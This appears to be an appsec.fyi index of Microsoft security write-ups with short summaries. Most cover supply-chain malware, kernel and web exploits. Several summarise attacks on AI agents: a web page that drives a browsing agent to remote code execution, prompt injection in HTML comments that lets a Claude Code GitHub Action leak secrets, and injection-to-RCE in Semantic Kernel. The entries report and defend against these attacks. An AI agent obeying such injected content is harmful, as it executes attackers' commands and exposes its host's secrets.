microsoft.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-06-25.
| Date Added | Resource | Excerpt |
|---|---|---|
| 2026-06-25 2026 | Taming our Python dependencies at Microsoft with AIPython | Microsoft is using AI to manage its extensive Python dependencies. This approach aims to improve dependency analysis, identify vulnerabilities, and ensure security and stability across their numerous projects. By leveraging AI, Microsoft seeks to streamline the complex process of tracking, updating, and securing its Python ecosystem, leading to more robust and reliable software development. |
| 2026-06-22 2026 | AutoJack: How a single page can RCE the host running your AI agentRCE | Technique AutoJack demonstrates how a single web page can achieve remote code execution on the host running an AI agent, specifically targeting AutoGen Studio. By exploiting three weaknesses in the Model Context Protocol (MCP) WebSocket — an origin allowlist easily bypassed by an agent, opt-out authentication middleware, and unvalidated `server_params` from the URL—an attacker can trick the browsing agent into executing arbitrary commands on the host. This crosses the localhost trust boundary, turning the agent into a delivery vehicle for RCE. |
| 2026-06-18 2026 | From package to postinstall payload: Inside the Mastra npm supply chain compromiseSupply Chain | Library for analyzing the Mastra npm supply chain compromise, detailing the exploitation of the `ehindero` maintainer account to inject malicious `easy-day-js` package dependencies. This attack leveraged a postinstall hook to disable TLS certificate verification, download a second-stage payload, and execute it as a hidden process. The analysis covers the staged delivery, obfuscated dropper, C2 communication, and Windows-specific techniques like reflective .NET assembly injection and host fingerprinting for persistence and further exploitation. |
| 2026-06-08 2026 | Securing CI/CD in an agentic world: Claude Code Github action caseAI | Library for securing CI/CD workflows, this entry details a vulnerability in Anthropic’s Claude Code GitHub Action. The Read tool within the action was not sandboxed like the Bash tool, allowing it to access `/proc/self/environ` and potentially exfiltrate sensitive secrets like `ANTHROPIC_API_KEY`. This vulnerability, discovered by Microsoft Threat Intelligence and addressed in version 2.1.128, highlights the risks of AI agents processing untrusted GitHub content in CI/CD environments, particularly when granted file-read capabilities or access to secrets. Prompt injection via HTML comments and disguised feature requests are illustrated as attack vectors. |
| 2026-06-03 2026 | Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaignSupply Chain | Library for detecting the "Miasma" supply chain attack, which compromised 32 npm packages under the @redhat-cloud-services scope. The attack used obfuscated dropper scripts to download the Bun JavaScript runtime and steal credentials from GitHub, npm, AWS, Azure, GCP, HashiCorp Vault, and Kubernetes. It also attempted privilege escalation via passwordless sudo and self-propagation by publishing poisoned packages with forged SLSA provenance, and included a destructive tripwire to wipe the home directory. |
| 2026-05-30 2026 | Malicious npm packages abuse dependency confusion to profile developer environmentsSupply Chain | Library for detecting malicious npm packages that exploit dependency confusion to profile developer environments. These packages impersonate internal corporate namespaces and use obfuscated reconnaissance payloads downloaded from attacker-controlled C2 servers. They leverage npm lifecycle hooks for automatic execution during `npm install`, employing anti-analysis techniques and targeting various operating systems. The attack chain involves namespace squatting, spoofed enterprise metadata, and inflated version numbers, with a reconnaissance-only mode that collects system information and credentials for potential follow-on exploitation. |
| 2026-05-29 2026 | Typosquatted npm packages used to steal cloud and CI/CD secretsSupply Chain | Library detailing an npm supply chain attack where typosquatted packages like "opensearch-setup" and "elastic-opensearch-helper" were used to steal AWS credentials, HashiCorp Vault tokens, and CI/CD secrets. The malicious packages leverage npm lifecycle hooks to execute a credential harvester that targets AWS IMDSv2, ECS task metadata, Secrets Manager across multiple regions, and npm publish tokens, enabling cloud lateral movement and downstream supply-chain pivoting. |
| 2026-05-21 2026 | Mini Shai Hulud: Compromised @antv npm packages enable CI/CD credential theftSupply Chain | Library for detecting and mitigating the Mini Shai Hulud supply chain attack, which compromised @antv npm packages. This attack used obfuscated JavaScript to steal credentials from GitHub Actions, AWS, HashiCorp Vault, npm, Kubernetes, and 1Password. The payload employed techniques like runner memory scraping, privilege escalation via bind mounts, dual-channel exfiltration through HTTPS and Git Data API, and SLSA provenance forgery. The library helps identify affected systems and pin safe package versions. |
| 2026-05-13 2026 | Defense at AI speed: Microsofts new multi-model agentic security system tops leading industry benchmarkRCE | Library for agentic AI-driven vulnerability discovery, codename MDASH, utilizes over 100 specialized agents and an ensemble of models to find and prove exploitable bugs. This system orchestrated across frontier and distilled models achieved top scores on industry benchmarks, including identifying 16 new vulnerabilities in Windows networking and authentication, four of which were Critical remote code execution flaws in components like the TCP/IP stack and IKEv2 service. MDASH's end-to-end pipeline includes stages for preparation, scanning, validation, deduplication, and proof, demonstrating a move towards production-grade, enterprise-scale AI vulnerability defense. |
| 2026-05-07 2026 | When prompts become shells: RCE vulnerabilities in AI agent frameworksRCE | Library providing security analysis of AI agent frameworks, detailing RCE vulnerabilities like CVE-2026-25592 and CVE-2026-26030 discovered in Semantic Kernel. The research highlights how prompt injection can lead to host-level code execution through unsafe string interpolation and blocklist bypasses in plugins like the In-Memory Vector Store, enabling attackers to leverage Semantic Kernel's tool execution capabilities for malicious purposes. |
| 2026-05-02 2026 | CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environmentsAuthZ | Analysis of CVE-2026-31431, nicknamed "Copy Fail," details a high-severity Linux kernel vulnerability affecting Red Hat, Ubuntu, SUSE, and AWS Linux. This logic flaw in the AF_ALG module allows local unprivileged users to gain root privileges by corrupting the kernel page cache, impacting cloud workloads and Kubernetes clusters. The exploit, a small script leveraging the splice() system call and AF_ALG, enables container breakout and lateral movement, posing a significant risk to multi-tenant environments. Microsoft Defender provides detection insights, mitigation recommendations, and hunting guidance. |
| 2026-04-11 2026 | Shai-Hulud 2.0: Detection and Defense GuidanceSupply Chain | Library providing detection and defense guidance for the Shai-Hulud 2.0 supply chain attack, which compromised numerous npm packages via preinstall scripts and stole credentials using tools like TruffleHog. It details attack propagation paths, the use of fake personas like "Linus Torvalds," and offers mitigation strategies including credential rotation, CI/CD isolation, and leveraging Microsoft Defender for its code scanning, posture management, and runtime anomaly detection capabilities. |
| 2026-04-11 2026 | Intent redirection vulnerability in third-party SDK exposed millions of Android walletsMobile | Writeup details an intent redirection vulnerability in the EngageSDK, a third-party Android library used by millions of applications, including crypto wallets. This flaw allowed malicious apps to bypass Android's security sandbox and access sensitive user data, including PII and financial information. The vulnerability, identified in the exported `MTCommonActivity` component, enabled attackers to craft intents that, when processed by the vulnerable SDK, could lead to unauthorized access, data exposure, and privilege escalation. While Google removed affected apps from the Play Store and provided platform-level mitigations, developers are urged to update to EngageSDK version 5.2.1 to resolve the issue. |
| 2026-04-11 2026 | How Microsoft Defends Against Indirect Prompt Injection AttacksAI | Library that defends against indirect prompt injection attacks targeting LLM-based systems. This library implements a multi-layered defense strategy including preventative techniques like hardened system prompts and Spotlighting, detection tools such as Microsoft Prompt Shields integrated with Defender for Cloud, and impact mitigation through data governance, user consent workflows, and deterministic blocking. It addresses vulnerabilities like data exfiltration via HTML images, clickable links, tool calls, and covert channels, as well as unintended actions and phishing. |
| 2026-04-10 2026 | Defending Against React2Shell in React Server ComponentsRCE | Reference detailing CVE-2025-55182 (React2Shell), a critical pre-authentication RCE vulnerability in React Server Components, affecting frameworks like Next.js. The vulnerability, stemming from insecure payload validation and prototype pollution, allows attackers to execute arbitrary code via a single HTTP request. Observed exploits target Windows and Linux environments, deploying coin miners and RATs, and attempting to steal cloud credentials using tools like TruffleHog and Gitleaks. Mitigation includes immediate patching to updated React and Next.js versions, prioritizing internet-facing assets, and potentially using WAF protections. |
| 2026-04-10 2026 | Weaponizing Cross Site Scripting: When One Bug Isn't EnoughXSS | Technique guide detailing how Cross-Site Scripting (XSS) can be weaponized by chaining it with vulnerabilities like open redirects, CSRF, weak CSP, insecure JSON logging leading to account takeover, file upload flaws for RCE, abusing administrative functions, and improper `postMessage` usage causing token leakage. It emphasizes that XSS rarely exists in isolation and attackers combine multiple weaknesses to escalate impact, making layered defenses crucial. |
| 2026-04-08 2026 | Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operationsRCE | Library detailing Storm-1175's high-tempo Medusa ransomware operations, exploiting N-days like CVE-2023-21529 (Microsoft Exchange), CVE-2023-27351 (Papercut), and CVE-2024-21887 (Ivanti), alongside zero-days. The actor rapidly chains exploits, establishes persistence via new users, uses tools like PsExec and RMMs (Atera, N-able), PDQ Deployer, and Impacket for lateral movement and credential theft before deploying ransomware. |
| 2026-04-04 2026 | Detecting and analyzing prompt abuse in AI toolsAI | Playbook detailing detection, investigation, and response to AI prompt abuse. It covers direct prompt overrides, extractive prompt abuse against sensitive inputs, and indirect prompt injection, including the HashJack technique affecting AI summarization tools via URL fragments. This guide leverages Microsoft security tools like Defender for Cloud Apps, Purview DLP, Microsoft Entra ID conditional access, and Microsoft Sentinel to monitor AI interactions and protect against manipulation. |
| 2026-04-03 2026 | Mitigating the Axios npm supply chain compromiseSupply Chain | Analysis of a recent Axios npm supply chain compromise reveals North Korean state actor Sapphire Sleet injected malicious dependencies into popular Axios versions 1.14.1 and 0.30.4. These compromised packages, utilizing a fake runtime dependency `plain-crypto-js@4.2.1` with silent install-time code execution, connected to a Sapphire Sleet-controlled C2 server at `hxxp://sfrclak[.]com:8000/6202033` to download platform-specific remote access trojan (RAT) payloads for Windows, macOS, and Linux. The attack highlights the risks of poisoned open-source frameworks, enabling actors to achieve broad downstream impact by compromising widely adopted libraries. |